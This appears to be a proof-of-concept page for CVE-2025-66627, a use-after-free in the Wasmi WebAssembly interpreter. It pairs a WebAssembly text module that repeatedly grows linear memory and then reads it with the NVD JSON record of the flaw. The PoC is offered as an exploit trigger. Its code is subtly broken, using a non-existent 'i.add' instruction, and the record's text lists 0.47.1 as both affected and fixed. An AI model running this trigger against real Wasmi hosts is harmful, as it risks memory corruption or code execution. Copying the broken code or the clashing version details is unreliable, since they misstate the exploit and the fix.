CVE-2025-66627

;; CVE-2025-66627 PoC - Wasmi Use After Free via Memory Growth ;; This PoC demonstrates triggering the Use After Free condition ;; through controlled memory growth operations (module (memory 1 256) ;; Initial memory: 1 page (64KB), max: 256 pages ;; Function to trigger memory growth (func $trigger_growth (result i32) (local $i i32) (local.set $i (i32.const 0)) ;; Loop to grow memory multiple times (block $exit (loop $loop ;; Grow memory by 1 page each iteration (drop (memory.grow (i32.const 1))) (local.set $i (i.add (local.get $i) (i32.const 1))) ;; Check if we've reached target growth (br_if $exit (i32.ge_u (local.get $i) (i32.const 100))) ;; Continue looping (br $loop) ) ) ;; Access memory after growth - triggers UAF if vulnerability exists (i32.load (i32.const 0)) ) ;; Export the trigger function (export "trigger_growth" (func $trigger_growth)) )

{"cve": {"id": "CVE-2025-66627", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:21.910", "lastModified": "2025-12-10T21:16:04.107", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wasmi is a WebAssembly interpreter focused on constrained and embedded systems. In versions 0.41.0, 0.41.1, 0.42.0 through 0.47.1, 0.50.0 through 0.51.2 and 1.0.0, Wasmi's linear memory implementation leads to a Use After Free vulnerability, triggered by a WebAssembly module under certain memory growth conditions. This issue potentially leads to memory corruption, information disclosure, or code execution. This issue is fixed in versions 0.41.2, 0.47.1, 0.51.3 and 1.0.1. To workaround this issue, consider limiting the maximum linear memory sizes where feasible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wasmi-labs:wasmi:*:*:*:*:*:rust:*:*", "versionStartIncluding": "0.41.0", "versionEndExcluding": "0.41.2", "matchCriteriaId": "DEC38241-42E1-416E-B258-4789ABCE4FAE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wasmi-labs:wasmi:*:*:*:*:*:rust:*:*", "versionStartIncluding": "0.47.0", "versionEndExcluding": "0.47.1", "matchCriteriaId": "1FF46E2B-0D1F-4875-8829-15A4B0F18337"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wasmi-labs:wasmi:*:*:*:*:*:rust:*:*", "versionStartIncluding": "0.51.0", "versionEndExcluding": "0.51.3", "matchCriteriaId": "3DD06F35-DCE6-436A-82E6-8ABFB27F882A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:wasmi-labs:wasmi:1.0.0:*:*:*:*:rust:*:*", "matchCriteriaId": "0C5B18F1-7C31-4A15-8A6B-FA4C4F2E8E6B"}]}]}], "references": [{"url": "https://github.com/wasmi-labs/wasmi/security/advisories/GHSA-g4v2-cjqp-rfmq", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}